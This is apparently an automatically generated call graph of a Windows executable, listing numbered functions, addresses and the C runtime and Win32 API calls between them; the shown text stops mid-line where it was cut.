26578->26580 26581 4027bd 26578->26581 26579->26582 26580->26581 26581->26535 26582->26577 26583->26540 26584->26541 26586 408f48 moneypunct 26585->26586 26587 4265c7 VariantClear 26586->26587 26588 408f55 moneypunct 26586->26588 26587->26588 26588->26543 26589->26552 26590->26540 26591->26540 26592->26564 26593->26540 26594->26560 26595->26540 26596->26550 26597->26540 26598->26540 26600 40a7a6 26599->26600 26601 40ae8c 26599->26601 26654 4115d7 26600->26654 26665 41130a 51 API calls __cinit 26601->26665 26604 40a86d 26605 40abd1 26604->26605 26621 40a878 moneypunct 26604->26621 26676 45e737 90 API calls 3 library calls 26605->26676 26608 408e80 VariantClear 26623 40a7c6 moneypunct _memmove 26608->26623 26609 42b791 VariantClear 26609->26623 26610 42ba2d VariantClear 26610->26623 26611 408f40 VariantClear 26611->26621 26612 42b459 VariantClear 26612->26623 26613 40a884 moneypunct 26613->26568 26614 40e270 VariantClear 26614->26623 26617 42b6f6 VariantClear 26617->26623 26618 40bc10 53 API calls 26618->26623 26619 4530c9 VariantClear 26619->26623 26620 42bb6a 26679 44b92d VariantClear 26620->26679 26621->26611 26621->26613 26622 42bbf5 26677 45e737 90 API calls 3 library calls 26622->26677 26623->26604 26623->26605 26623->26608 26623->26609 26623->26610 26623->26612 26623->26614 26623->26617 26623->26618 26623->26619 26623->26620 26623->26622 26626 4115d7 52 API calls 26623->26626 26627 40b5f0 89 API calls 26623->26627 26628 408f40 VariantClear 26623->26628 26631 4115d7 52 API calls 26623->26631 26635 42bc37 26623->26635 26640 408cc0 26623->26640 26666 401b10 26623->26666 26672 45308a 53 API calls 26623->26672 26673 470870 52 API calls 26623->26673 26674 457f66 87 API calls __write_nolock 26623->26674 26675 472f47 127 API calls 26623->26675 26625 42bc5b 26625->26568 26629 42b5b3 VariantInit VariantCopy 26626->26629 26627->26623 26628->26623 26629->26623 26633 42b5d7 VariantClear 26629->26633 26631->26623 26633->26623 26678 45e737 90 API calls 3 library calls 26635->26678 26638 42bc48 26639 408f40 VariantClear 26638->26639 26639->26620 26680 408d90 26640->26680 26642 429778 26702 410c60 VariantClear moneypunct 26642->26702 26644 429780 26645 42976c 26701 45e737 90 API calls 3 library calls 26645->26701 26646 408cf9 26646->26642 26646->26645 26648 408d2d 26646->26648 26696 403d10 26648->26696 26650 408d3d 26650->26642 26653 408d45 moneypunct 26650->26653 26651 408d71 moneypunct 26651->26623 26652 408f40 VariantClear 26652->26653 26653->26651 26653->26652 26656 4115e1 _malloc 26654->26656 26657 4115fb 26656->26657 26661 4115fd std::exception::exception 26656->26661 26711 4135bb 26656->26711 26657->26623 26658 41163b 26726 4180af 46 API calls std::exception::operator= 26658->26726 26660 411645 26727 418105 RaiseException 26660->26727 26661->26658 26725 41130a 51 API calls __cinit 26661->26725 26664 411656 26665->26623 26667 401b16 _wcslen 26666->26667 26668 4115d7 52 API calls 26667->26668 26671 401b63 26667->26671 26669 401b4b _memmove 26668->26669 26670 4115d7 52 API calls 26669->26670 26670->26671 26671->26623 26672->26623 26673->26623 26674->26623 26675->26623 26676->26620 26677->26620 26678->26638 26679->26625 26681 4289d2 26680->26681 26682 408db3 26680->26682 26705 45e737 90 API calls 3 library calls 26681->26705 26703 40bec0 90 API calls 26682->26703 26685 408dc9 26686 4289e5 26685->26686 26688 428a05 26685->26688 26691 40a780 141 API calls 26685->26691 26692 408e64 26685->26692 26694 408f40 VariantClear 26685->26694 26695 408e5a 26685->26695 26704 40ba10 52 API calls 2 library calls 26685->26704 26706 45e737 90 API calls 3 library calls 26686->26706 26690 408f40 VariantClear 26688->26690 26690->26695 26691->26685 26693 408f40 VariantClear 26692->26693 26693->26695 26694->26685 26695->26646 26697 408f40 VariantClear 26696->26697 26698 403d20 26697->26698 26707 403cd0 26698->26707 26700 403d4d 26700->26650 26701->26642 26702->26644 26703->26685 26704->26685 26705->26686 26706->26688 26708 403cdf 26707->26708 26709 408f40 VariantClear 26708->26709 26710 403ce7 26709->26710 26710->26700 26712 413638 _malloc 26711->26712 26718 4135c9 _malloc 26711->26718 26735 417f77 46 API calls __getptd_noexit 26712->26735 26715 4135f7 RtlAllocateHeap 26715->26718 26724 413630 26715->26724 26717 413624 26733 417f77 46 API calls __getptd_noexit 26717->26733 26718->26715 26718->26717 26721 413622 26718->26721 26722 4135d4 26718->26722 26734 417f77 46 API calls __getptd_noexit 26721->26734 26722->26718 26728 418901 46 API calls __NMSG_WRITE 26722->26728 26729 418752 46 API calls 7 library calls 26722->26729 26730 411682 26722->26730 26724->26656 26725->26658 26726->26660 26727->26664 26728->26722 26729->26722 26736 411657 GetModuleHandleW 26730->26736 26733->26721 26734->26724 26735->26724 26737 411680 ExitProcess 26736->26737 26738 41166b GetProcAddress 26736->26738 26738->26737 26739 41167b 26738->26739 26739->26737 28632 40d0d0 53 API calls 28633 416cd0 6 API calls 3 library calls 28634 41f4d6 47 API calls 2 library calls 28558 4118da 28561 41179a 28558->28561 28560 4118eb 28562 4117a6 __write 28561->28562 28563 4182cb __lock 46 API calls 28562->28563 28567 4117ad _raise 28563->28567 28566 4118d4 __write 28566->28560 28574 4118c5 28567->28574 28569 4118bc 28570 4118c5 28569->28570 28571 411682 __mtinitlocknum 3 API calls 28569->28571 28573 4118d2 28570->28573 28579 4181f2 LeaveCriticalSection 28570->28579 28571->28570 28573->28560 28575 4118a5 28574->28575 28576 4118cb 28574->28576 28575->28566 28578 4181f2 LeaveCriticalSection 28575->28578 28580 4181f2 LeaveCriticalSection 28576->28580 28578->28569 28579->28573 28580->28575 26740 4010e0 26743 401100 26740->26743 26742 4010f8 26744 401113 26743->26744 26745 401182 26744->26745 26747 401120 26744->26747 26748 401184 26744->26748 26749 40114c 26744->26749 26746 40112c DefWindowProcW 26745->26746 26746->26742 26747->26746 26806 401000 Shell_NotifyIconW _memset 26747->26806 26781 401250 61 API calls _memset 26748->26781 26750 401151 26749->26750 26751 40119d 26749->26751 26753 401219 26750->26753 26754 40115d 26750->26754 26756 4011a3 26751->26756 26757 42afb4 26751->26757 26753->26747 26760 401225 26753->26760 26758 401163 26754->26758 26759 42b01d 26754->26759 26755 401193 26755->26742 26756->26747 26766 4011b6 KillTimer 26756->26766 26767 4011db SetTimer RegisterWindowMessageW 26756->26767 26783 40f190 26757->26783 26763 42afe9 26758->26763 26764 40116c 26758->26764 26759->26746 26805 4370f4 52 API calls 26759->26805 26808 468b0e 74 API calls _memset 26760->26808 26773 40f190 10 API calls 26763->26773 26764->26747 26770 401174 26764->26770 26765 42b04f 26807 40e0c0 74 API calls _memset 26765->26807 26782 401000 Shell_NotifyIconW _memset 26766->26782 26767->26755 26768 401204 CreatePopupMenu 26767->26768 26768->26742 26788 45fd57 65 API calls _memset 26770->26788 26776 42b00e 26773->26776 26775 42afe4 26775->26755 26789 401a50 26776->26789 26777 4011c9 PostQuitMessage 26777->26742 26780 42afdc 26780->26746 26780->26775 26781->26755 26782->26777 26809 40f170 26783->26809 26785 40f1c8 26785->26755 26786 40f19d 26786->26785 26813 44b79b 7 API calls 26786->26813 26788->26780 26790 401b10 52 API calls 26789->26790 26791 401a7b 26790->26791 26815 403e10 26791->26815 26793 401a8d 26794 408f40 VariantClear 26793->26794 26795 401aa2 26794->26795 26796 401b10 52 API calls 26795->26796 26797 401ab9 26796->26797 26798 403e10 53 API calls 26797->26798 26799 401acb 26798->26799 26800 401af8 26799->26800 26832 465124 53 API calls 26799->26832 26833 46ff4b 294 API calls 26799->26833 26801 408f40 VariantClear 26800->26801 26803 401b0a 26801->26803 26803->26745 26805->26745 26806->26765 26807->26745 26808->26775 26812 40f180 26809->26812 26810 40f188 26810->26786 26812->26810 26814 442651 WaitForSingleObject InternetCloseHandle InternetCloseHandle 26812->26814 26813->26786 26814->26812 26834 403ea0 52 API calls __cinit 26815->26834 26817 403e1d 26818 403e25 26817->26818 26820 428987 26817->26820 26819 4115d7 52 API calls 26818->26819 26821 403e34 26819->26821 26842 408e80 VariantClear 26820->26842 26823 403e44 26821->26823 26835 40bc70 26821->26835 26826 403e51 26823->26826 26840 403c30 52 API calls _memmove 26823->26840 26824 428993 26824->26793 26828 4115d7 52 API calls 26826->26828 26829 403e5e 26828->26829 26841 403da0 52 API calls 26829->26841 26831 403e82 26831->26793 26832->26799 26833->26799 26834->26817 26836 4115d7 52 API calls 26835->26836 26837 40bc98 26836->26837 26838 4115d7 52 API calls 26837->26838 26839 40bca6 26838->26839 26839->26823 26840->26826 26841->26831 26842->26824 28635 40c6e0 58 API calls 28637 4440e0 53 API calls 2 library calls 28639 4318eb HttpQueryInfoW 28640 432ee9 60 API calls __forcdecpt_l 28642 4404e8 8 API calls 28643 4414f4 GetWindowLongW PostMessageW 28644 4424f3 128 API calls 28646 435481 VariantCopy VariantChangeType 28647 443a87 56 API calls moneypunct 28648 443c87 52 API calls 28649 440880 56 API calls 28650 448480 GetMenuItemInfoW IsMenu InsertMenuItemW DrawMenuBar _memset 28651 442a83 7 API calls 28654 447e8e 53 API calls 28655 43288e InterlockedIncrement 26843 40dc90 26844 40bc70 52 API calls 26843->26844 26845 40dd03 26844->26845 26850 40f210 26845->26850 26848 40dd96 26849 40ddb7 26848->26849 26853 40dc00 52 API calls 2 library calls 26848->26853 26854 40f250 RegOpenKeyExW 26850->26854 26852 40f230 26852->26848 26853->26848 26855 425e17 26854->26855 26856 40f275 RegQueryValueExW 26854->26856 26855->26852 26857 40f2c3 RegCloseKey 26856->26857 26858 40f298 26856->26858 26857->26852 26859 40f2a9 RegCloseKey 26858->26859 26860 425e1d 26858->26860 26859->26852 28657 433493 60 API calls 3 library calls 28658 44429f 64 API calls 28659 43009d 14 API calls 28660 44389a 53 API calls 2 library calls 28661 41aaa1 53 API calls __calloc_crt 28662 4368a0 SendMessageW SendMessageW SendMessageW SendMessageW 28663 4478ac 6 API calls 28664 434aa8 FreeLibrary moneypunct 28665 4426a9 WaitForSingleObject 26861 40d6b0 26862 42e2f3 26861->26862 26863 40d6cc 26861->26863 26864 408f40 VariantClear 26863->26864 26865 40d707 26864->26865 26884 40ebb0 26865->26884 26871 40d737 26887 411951 26871->26887 26873 40d751 26899 40f4e0 SystemParametersInfoW SystemParametersInfoW 26873->26899 26875 40d75f 26900 40d590 GetCurrentDirectoryW 26875->26900 26877 40d767 SystemParametersInfoW 26878 40d794 26877->26878 26879 40d78d FreeLibrary 26877->26879 26880 408f40 VariantClear 26878->26880 26879->26878 26881 40d79d 26880->26881 26882 408f40 VariantClear 26881->26882 26883 40d7a6 26882->26883 26940 40ebd0 26884->26940 26944 4182cb 26887->26944 26889 41195e 26951 4181f2 LeaveCriticalSection 26889->26951 26891 40d748 26892 4119b0 26891->26892 26893 4119d6 26892->26893 26894 4119bc 26892->26894 26893->26873 26894->26893 26998 417f77 46 API calls __getptd_noexit 26894->26998 26896 4119c6 26999 417f25 10 API calls __filbuf 26896->26999 26898 4119d1 26898->26873 26899->26875 27000 401f20 26900->27000 26902 40d5b6 IsDebuggerPresent 26903 40d5c4 26902->26903 26904 42e1bb MessageBoxA 26902->26904 26905 42e1d4 26903->26905 26906 40d5e3 26903->26906 26904->26905 27171 403a50 52 API calls 3 library calls 26905->27171 27070 40f520 26906->27070 26910 40d5fd GetFullPathNameW 27082 401460 26910->27082 26912 40d63b 26913 40d643 26912->26913 26914 42e231 SetCurrentDirectoryW 26912->26914 26915 40d64c 26913->26915 27172 432fee 6 API calls 26913->27172 26914->26913 27097 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 26915->27097 26918 42e252 26918->26915 26920 42e25a GetModuleFileNameW 26918->26920 26922 42e274 26920->26922 26923 42e2cb GetForegroundWindow ShellExecuteW 26920->26923 26924 401b10 52 API calls 26922->26924 26928 40d688 26923->26928 26929 42e281 26924->26929 26925 40d669 27105 4091e0 26925->27105 26926 40d656 26926->26925 27169 40e0c0 74 API calls _memset 26926->27169 26932 40d692 SetCurrentDirectoryW 26928->26932 27173 40d200 52 API calls 2 library calls 26929->27173 26932->26877 26934 42e28d 27174 40d200 52 API calls 2 library calls 26934->27174 26937 42e299 GetForegroundWindow ShellExecuteW 26938 42e2c6 26937->26938 26938->26928 26939 40ec00 LoadLibraryA GetProcAddress 26939->26871 26941 40d72e 26940->26941 26942 40ebd6 LoadLibraryA 26940->26942 26941->26871 26941->26939 26942->26941 26943 40ebe7 GetProcAddress 26942->26943 26943->26941 26945 4182e0 26944->26945 26946 4182f3 EnterCriticalSection 26944->26946 26952 418209 26945->26952 26946->26889 26948 4182e6 26948->26946 26979 411924 46 API calls 3 library calls 26948->26979 26950 4182f2 26950->26946 26951->26891 26953 418215 __write 26952->26953 26954 418225 26953->26954 26955 41823d 26953->26955 26980 418901 46 API calls __NMSG_WRITE 26954->26980 26963 41824b __write 26955->26963 26982 416b04 26955->26982 26958 41822a 26981 418752 46 API calls 7 library calls 26958->26981 26961 41825d 26988 417f77 46 API calls __getptd_noexit 26961->26988 26962 41826c 26966 4182cb __lock 45 API calls 26962->26966 26963->26948 26964 418231 26967 411682 __mtinitlocknum 3 API calls 26964->26967 26968 418273 26966->26968 26969 41823b 26967->26969 26970 4182a6 26968->26970 26971 41827b InitializeCriticalSectionAndSpinCount 26968->26971 26969->26955 26972 413748 _free 45 API calls 26970->26972 26973 418297 26971->26973 26974 41828b 26971->26974 26972->26973 26996 4182c2 LeaveCriticalSection _doexit 26973->26996 26989 413748 26974->26989 26977 418291 26995 417f77 46 API calls __getptd_noexit 26977->26995 26979->26950 26980->26958 26981->26964 26985 416b0d 26982->26985 26983 4135bb _malloc 45 API calls 26983->26985 26984 416b43 26984->26961 26984->26962 26985->26983 26985->26984 26986 416b24 Sleep 26985->26986 26987 416b39 26986->26987 26987->26984 26987->26985 26988->26963 26990 41377c _free 26989->26990 26991 413753 RtlFreeHeap 26989->26991 26990->26977 26991->26990 26992 413768 26991->26992 26997 417f77 46 API calls __getptd_noexit 26992->26997 26994 41376e GetLastError 26994->26990 26995->26973 26996->26963 26997->26994 26998->26896 26999->26898 27175 40e6e0 27000->27175 27004 401f41 GetModuleFileNameW 27193 410100 27004->27193 27006 401f5c 27205 410960 27006->27205 27009 401b10 52 API calls 27010 401f81 27009->27010 27208 401980 27010->27208 27012 401f8e 27013 408f40 VariantClear 27012->27013 27014 401f9d 27013->27014 27015 401b10 52 API calls 27014->27015 27016 401fb4 27015->27016 27017 401980 53 API calls 27016->27017 27018 401fc3 27017->27018 27019 401b10 52 API calls 27018->27019 27020 401fd2 27019->27020 27216 40c2c0 27020->27216 27022 401fe1 27023 40bc70 52 API calls 27022->27023 27024 401ff3 27023->27024 27234 401a10 27024->27234 27026 401ffe 27241 4114ab 27026->27241 27029 428b05 27031 401a10 52 API calls 27029->27031 27030 402017 27032 4114ab __wcsicoll 58 API calls 27030->27032 27033 428b18 27031->27033 27034 402022 27032->27034 27036 401a10 52 API calls 27033->27036 27034->27033 27035 40202d 27034->27035 27037 4114ab __wcsicoll 58 API calls 27035->27037 27038 428b33 27036->27038 27039 402038 27037->27039 27041 428b3b GetModuleFileNameW 27038->27041 27040 402043 27039->27040 27039->27041 27042 4114ab __wcsicoll 58 API calls 27040->27042 27043 401a10 52 API calls 27041->27043 27044 40204e 27042->27044 27045 428b6c 27043->27045 27048 401a10 52 API calls 27044->27048 27050 428b90 _wcscpy 27044->27050 27061 402092 27044->27061 27253 40e0a0 27045->27253 27053 402073 _wcscpy 27048->27053 27049 401a10 52 API calls 27054 428b88 27049->27054 27056 401a10 52 API calls 27050->27056 27051 428bc6 27052 4020a3 27052->27051 27249 40e830 53 API calls 27052->27249 27059 401a10 52 API calls 27053->27059 27054->27050 27065 4020d0 27056->27065 27057 4020bb 27250 40cf00 53 API calls 27057->27250 27059->27061 27060 4020c6 27062 408f40 VariantClear 27060->27062 27061->27050 27061->27052 27062->27065 27064 402110 27067 408f40 VariantClear 27064->27067 27065->27064 27068 401a10 52 API calls 27065->27068 27251 40cf00 53 API calls 27065->27251 27252 40e6a0 53 API calls 27065->27252 27069 402120 moneypunct 27067->27069 27068->27065 27069->26902 27071 4295c9 _memset 27070->27071 27072 40f53c 27070->27072 27074 4295d9 GetOpenFileNameW 27071->27074 28096 410120 27072->28096 27074->27072 27076 40d5f5 27074->27076 27075 40f545 28100 4102b0 SHGetMalloc 27075->28100 27076->26910 27076->26912 27078 40f54c 28105 410190 GetFullPathNameW 27078->28105 27080 40f559 28116 40f570 27080->28116 28170 402400 27082->28170 27084 40146f 27087 428c29 _wcscat 27084->27087 28179 401500 27084->28179 27086 40147c 27086->27087 28187 40d440 27086->28187 27089 401489 27089->27087 27090 401491 GetFullPathNameW 27089->27090 27091 402160 52 API calls 27090->27091 27092 4014bb 27091->27092 27093 402160 52 API calls 27092->27093 27094 4014c8 27093->27094 27094->27087 27095 402160 52 API calls 27094->27095 27096 4014ee 27095->27096 27096->26912 27098 428361 27097->27098 27099 4103fc LoadImageW RegisterClassExW 27097->27099 28237 44395e EnumResourceNamesW LoadImageW 27098->28237 28236 410490 7 API calls 27099->28236 27102 40d651 27104 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 27102->27104 27103 428368 27104->26926 27106 409202 27105->27106 27107 42d7ad 27105->27107 27126 409216 moneypunct 27106->27126 28326 410940 294 API calls 27106->28326 28327 45e737 90 API calls 3 library calls 27107->28327 27110 409386 27111 40939c 27110->27111 27112 40f190 10 API calls 27110->27112 27111->26928 27170 401000 Shell_NotifyIconW _memset 27111->27170 27113 4095b2 27112->27113 27113->27111 27115 401a50 272 API calls 27113->27115 27114 409253 PeekMessageW 27114->27126 27117 4095c6 LockWindowUpdate KiUserCallbackDispatcher GetMessageW 27115->27117 27116 42d8cd Sleep 27116->27126 27117->27111 27120 4095f9 27117->27120 27119 42e13b 28341 40d410 VariantClear 27119->28341 27123 42e158 TranslateMessage DispatchMessageW GetMessageW 27120->27123 27123->27111 27123->27123 27125 409567 PeekMessageW 27125->27126 27126->27110 27126->27114 27126->27116 27126->27119 27126->27125 27129 46f3c1 97 API calls 27126->27129 27130 40e0a0 52 API calls 27126->27130 27132 42dcd2 WaitForSingleObject 27126->27132 27133 409551 TranslateMessage DispatchMessageW 27126->27133 27136 42dd3d Sleep 27126->27136 27137 47d33e 272 API calls 27126->27137 27141 4094cf Sleep 27126->27141 27142 42d94d timeGetTime 27126->27142 27144 40d410 VariantClear 27126->27144 27150 4094e0 27126->27150 27159 45e737 90 API calls 27126->27159 27161 408cc0 141 API calls 27126->27161 27162 42e0cc VariantClear 27126->27162 27163 408f40 VariantClear 27126->27163 28238 4091b0 27126->28238 28296 40afa0 27126->28296 28322 4096a0 294 API calls 4 library calls 27126->28322 28323 408fc0 200 API calls moneypunct 27126->28323 28324 40d150 TranslateAcceleratorW 27126->28324 28325 40d170 IsDialogMessageW GetClassLongW 27126->28325 28328 465124 53 API calls 27126->28328 28329 40c620 timeGetTime 27126->28329 28340 40e270 VariantClear moneypunct 27126->28340 27128 44c29d 52 API calls 27128->27150 27129->27126 27130->27126 27131 46fdbf 98 API calls 27131->27150 27132->27126 27138 42dcf0 GetExitCodeProcess CloseHandle 27132->27138 27133->27125 27136->27150 27137->27126 28334 40d410 VariantClear 27138->28334 27141->27150 28330 465124 53 API calls 27142->28330 27144->27126 27146 40c620 timeGetTime 27146->27150 27148 465124 53 API calls 27148->27150 27150->27126 27150->27128 27150->27131 27150->27146 27150->27148 27151 42dd89 CloseHandle 27150->27151 27153 42de19 GetExitCodeProcess CloseHandle 27150->27153 27154 403cd0 VariantClear 27150->27154 27156 42de88 Sleep 27150->27156 27164 401b10 52 API calls 27150->27164 27166 401980 53 API calls 27150->27166 27168 408f40 VariantClear 27150->27168 28331 45178a 54 API calls 27150->28331 28332 47d33e 294 API calls 27150->28332 28333 453bc6 54 API calls 27150->28333 28335 40d410 VariantClear 27150->28335 28336 443d19 67 API calls _wcslen 27150->28336 28337 4574b4 VariantClear 27150->28337 28338 4731e1 VariantClear 27150->28338 28339 4331a2 6 API calls 27150->28339 27151->27150 27153->27150 27154->27156 27156->27126 27159->27126 27161->27126 27162->27126 27163->27126 27164->27150 27166->27150 27168->27150 27169->26925 27170->26928 27171->26912 27172->26918 27173->26934 27174->26937 27176 40bc70 52 API calls 27175->27176 27177 401f31 27176->27177 27178 402560 27177->27178 27179 40256d __write_nolock 27178->27179 27257 402160 27179->27257 27182 402593 27192 4025bd 27182->27192 27270 401c90 27182->27270 27184 4026a7 27185 401b10 52 API calls 27184->27185 27191 4026db 27184->27191 27186 4026d1 27185->27186 27281 40d7c0 52 API calls 2 library calls 27186->27281 27187 401b10 52 API calls 27187->27192 27189 401c90 52 API calls 27189->27192 27191->27004 27192->27184 27192->27187 27192->27189 27273 4026f0 27192->27273 27280 40d7c0 52 API calls 2 library calls 27192->27280 27290 40f760 27193->27290 27196 410118 27196->27006 27198 42805d 27199 42806a 27198->27199 27346 431e58 27198->27346 27201 413748 _free 46 API calls 27199->27201 27202 428078 27201->27202 27203 431e58 82 API calls 27202->27203 27204 428084 27203->27204 27204->27006 27206 4115d7 52 API calls 27205->27206 27207 401f74 27206->27207 27207->27009 27209 4019a3 27208->27209 27210 401985 27208->27210 27209->27210 27211 4019b8 27209->27211 27213 40199f 27210->27213 27214 403e10 53 API calls 27210->27214 27212 403e10 53 API calls 27211->27212 27215 4019c4 27212->27215 27213->27012 27214->27213 27215->27012 27217 40c2c7 27216->27217 27218 40c30e 27216->27218 27219 40c2d3 27217->27219 27220 426c79 27217->27220 27221 40c315 27218->27221 27222 426c2b 27218->27222 28085 403ea0 52 API calls __cinit 27219->28085 28090 4534e3 52 API calls 27220->28090 27226 40c321 27221->27226 27227 426c5a 27221->27227 27224 426c4b 27222->27224 27225 426c2e 27222->27225 28088 4534e3 52 API calls 27224->28088 27232 40c2de 27225->27232 28087 4534e3 52 API calls 27225->28087 28086 403ea0 52 API calls __cinit 27226->28086 28089 4534e3 52 API calls 27227->28089 27232->27022 27235 401a30 27234->27235 27236 401a17 27234->27236 27238 402160 52 API calls 27235->27238 27237 401a2d 27236->27237 28091 403c30 52 API calls _memmove 27236->28091 27237->27026 27239 401a3d 27238->27239 27239->27026 27242 411523 27241->27242 27243 4114ba 27241->27243 28094 4113a8 58 API calls 3 library calls 27242->28094 27248 40200c 27243->27248 28092 417f77 46 API calls __getptd_noexit 27243->28092 27246 4114c6 28093 417f25 10 API calls __filbuf 27246->28093 27248->27029 27248->27030 27249->27057 27250->27060 27251->27065 27252->27065 27254 40e0b2 27253->27254 27255 40e0a8 27253->27255 27254->27049 28095 403c30 52 API calls _memmove 27255->28095 27258 426daa 27257->27258 27259 40216b _wcslen 27257->27259 27284 40c600 27258->27284 27262 402180 27259->27262 27263 40219e 27259->27263 27261 426db5 27261->27182 27282 403bd0 52 API calls moneypunct 27262->27282 27283 4013a0 52 API calls 27263->27283 27266 402187 _memmove 27266->27182 27267 4021a5 27268 426db7 27267->27268 27269 4115d7 52 API calls 27267->27269 27269->27266 27271 4026f0 52 API calls 27270->27271 27272 401c97 27271->27272 27272->27182 27274 426873 27273->27274 27275 4026ff 27273->27275 27289 4013a0 52 API calls 27274->27289 27275->27192 27277 42687b 27278 4115d7 52 API calls 27277->27278 27279 42689e _memmove 27278->27279 27279->27192 27280->27192 27281->27191 27282->27266 27283->27267 27285 40c619 27284->27285 27286 40c60a 27284->27286 27285->27261 27286->27285 27287 4026f0 52 API calls 27286->27287 27288 426d7a _memmove 27287->27288 27288->27261 27289->27277 27350 40f6f0 27290->27350 27292 40f77b moneypunct 27358 40f850 27292->27358 27298 40f7fc 27299 427c2a 27298->27299 27300 40f804 27298->27300 27388 414d04 27299->27388 27375 414a46 27300->27375 27305 40f80e 27305->27196 27309 4528bd 27305->27309 27306 427c59 27394 414fe2 27306->27394 27308 427c79 27310 4150d1 _fseek 81 API calls 27309->27310 27311 452930 27310->27311 28027 452719 27311->28027 27314 452948 27314->27198 27315 414d04 __fread_nolock 61 API calls 27316 452966 27315->27316 27317 414d04 __fread_nolock 61 API calls 27316->27317 27318 452976 27317->27318 27319 414d04 __fread_nolock 61 API calls 27318->27319 27320 45298f 27319->27320 27321 414d04 __fread_nolock 61 API calls 27320->27321 27322 4529aa 27321->27322 27323 4150d1 _fseek 81 API calls 27322->27323 27324 4529c4 27323->27324 27325 4135bb _malloc 46 API calls 27324->27325 27326 4529cf 27325->27326 27327 4135bb _malloc 46 API calls 27326->27327 27328 4529db 27327->27328 27329 414d04 __fread_nolock 61 API calls 27328->27329 27330 4529ec 27329->27330 27331 44afef GetSystemTimeAsFileTime 27330->27331 27332 452a00 27331->27332 27333 452a36 27332->27333 27334 452a13 27332->27334 27335 452aa5 27333->27335 27336 452a3c 27333->27336 27337 413748 _free 46 API calls 27334->27337 27339 413748 _free 46 API calls 27335->27339 28033 44b1a9 27336->28033 27340 452a1c 27337->27340 27342 452aa3 27339->27342 27343 413748 _free 46 API calls 27340->27343 27341 452a9d 27344 413748 _free 46 API calls 27341->27344 27342->27198 27345 452a25 27343->27345 27344->27342 27345->27198 27347 431e64 27346->27347 27348 431e6a 27346->27348 27349 414a46 82 API calls 27347->27349 27348->27199 27349->27348 27351 425de2 27350->27351 27354 40f6fc _wcslen 27350->27354 27351->27292 27352 40f710 WideCharToMultiByte 27353 40f756 27352->27353 27355 40f728 27352->27355 27353->27292 27354->27352 27356 4115d7 52 API calls 27355->27356 27357 40f735 WideCharToMultiByte 27356->27357 27357->27292 27360 40f85d _memset _strlen 27358->27360 27359 426b3b 27360->27359 27362 40f7ab 27360->27362 27407 414db8 27360->27407 27363 4149c2 27362->27363 27422 414904 27363->27422 27365 40f7e9 27365->27299 27366 40f5c0 27365->27366 27371 40f5cd __write_nolock _memmove 27366->27371 27367 414d04 __fread_nolock 61 API calls 27367->27371 27368 40f691 __tzset_nolock 27368->27298 27370 425d11 27372 4150d1 _fseek 81 API calls 27370->27372 27371->27367 27371->27368 27371->27370 27620 4150d1 27371->27620 27373 425d33 27372->27373 27374 414d04 __fread_nolock 61 API calls 27373->27374 27374->27368 27376 414a52 __write 27375->27376 27377 414a64 27376->27377 27378 414a79 27376->27378 27776 417f77 46 API calls __getptd_noexit 27377->27776 27381 415471 __lock_file 47 API calls 27378->27381 27384 414a74 __write 27378->27384 27380 414a69 27777 417f25 10 API calls __filbuf 27380->27777 27383 414a92 27381->27383 27760 4149d9 27383->27760 27384->27305 27832 414c76 27388->27832 27390 414d1c 27391 44afef 27390->27391 28020 442c5a 27391->28020 27393 44b00d 27393->27306 27395 414fee __write 27394->27395 27396 414ffa 27395->27396 27397 41500f 27395->27397 28024 417f77 46 API calls __getptd_noexit 27396->28024 27399 415471 __lock_file 47 API calls 27397->27399 27401 415017 27399->27401 27400 414fff 28025 417f25 10 API calls __filbuf 27400->28025 27403 414e4e __ftell_nolock 51 API calls 27401->27403 27404 415024 27403->27404 28026 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 27404->28026 27406 41500a __write 27406->27308 27408 414dd6 27407->27408 27409 414deb 27407->27409 27418 417f77 46 API calls __getptd_noexit 27408->27418 27409->27408 27410 414df2 27409->27410 27420 41b91b 79 API calls 10 library calls 27410->27420 27413 414ddb 27419 417f25 10 API calls __filbuf 27413->27419 27414 414e18 27416 414de6 27414->27416 27421 418f98 77 API calls 5 library calls 27414->27421 27416->27360 27418->27413 27419->27416 27420->27414 27421->27416 27425 414910 __write 27422->27425 27423 414923 27478 417f77 46 API calls __getptd_noexit 27423->27478 27425->27423 27427 414951 27425->27427 27426 414928 27479 417f25 10 API calls __filbuf 27426->27479 27441 41d4d1 27427->27441 27430 414956 27431 41496a 27430->27431 27432 41495d 27430->27432 27433 414992 27431->27433 27434 414972 27431->27434 27480 417f77 46 API calls __getptd_noexit 27432->27480 27458 41d218 27433->27458 27481 417f77 46 API calls __getptd_noexit 27434->27481 27438 414933 __write @_EH4_CallFilterFunc@8 27438->27365 27442 41d4dd __write 27441->27442 27443 4182cb __lock 46 API calls 27442->27443 27454 41d4eb 27443->27454 27444 41d567 27446 416b04 __malloc_crt 46 API calls 27444->27446 27448 41d56e 27446->27448 27447 41d5f0 __write 27447->27430 27449 41d57c InitializeCriticalSectionAndSpinCount 27448->27449 27456 41d560 27448->27456 27451 41d59c 27449->27451 27452 41d5af EnterCriticalSection 27449->27452 27455 413748 _free 46 API calls 27451->27455 27452->27456 27453 418209 __mtinitlocknum 46 API calls 27453->27454 27454->27444 27454->27453 27454->27456 27486 4154b2 47 API calls __lock 27454->27486 27487 415520 LeaveCriticalSection LeaveCriticalSection _doexit 27454->27487 27455->27456 27483 41d5fb 27456->27483 27459 41d23a 27458->27459 27460 41d255 27459->27460 27472 41d26c __wopenfile 27459->27472 27492 417f77 46 API calls __getptd_noexit 27460->27492 27461 41d421 27464 41d47a 27461->27464 27465 41d48c 27461->27465 27463 41d25a 27493 417f25 10 API calls __filbuf 27463->27493 27497 417f77 46 API calls __getptd_noexit 27464->27497 27489 422bf9 27465->27489 27469 41d47f 27498 417f25 10 API calls __filbuf 27469->27498 27470 41499d 27482 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 27470->27482 27472->27461 27472->27464 27494 41341f 58 API calls 2 library calls 27472->27494 27474 41d41a 27474->27461 27495 41341f 58 API calls 2 library calls 27474->27495 27476 41d439 27476->27461 27496 41341f 58 API calls 2 library calls 27476->27496 27478->27426 27479->27438 27480->27438 27481->27438 27482->27438 27488 4181f2 LeaveCriticalSection 27483->27488 27485 41d602 27485->27447 27486->27454 27487->27454 27488->27485 27499 422b35 27489->27499 27491 422c14 27491->27470 27492->27463 27493->27470 27494->27474 27495->27476 27496->27461 27497->27469 27498->27470 27502 422b41 __write 27499->27502 27500 422b54 27617 417f77 46 API calls __getptd_noexit 27500->27617 27502->27500 27504 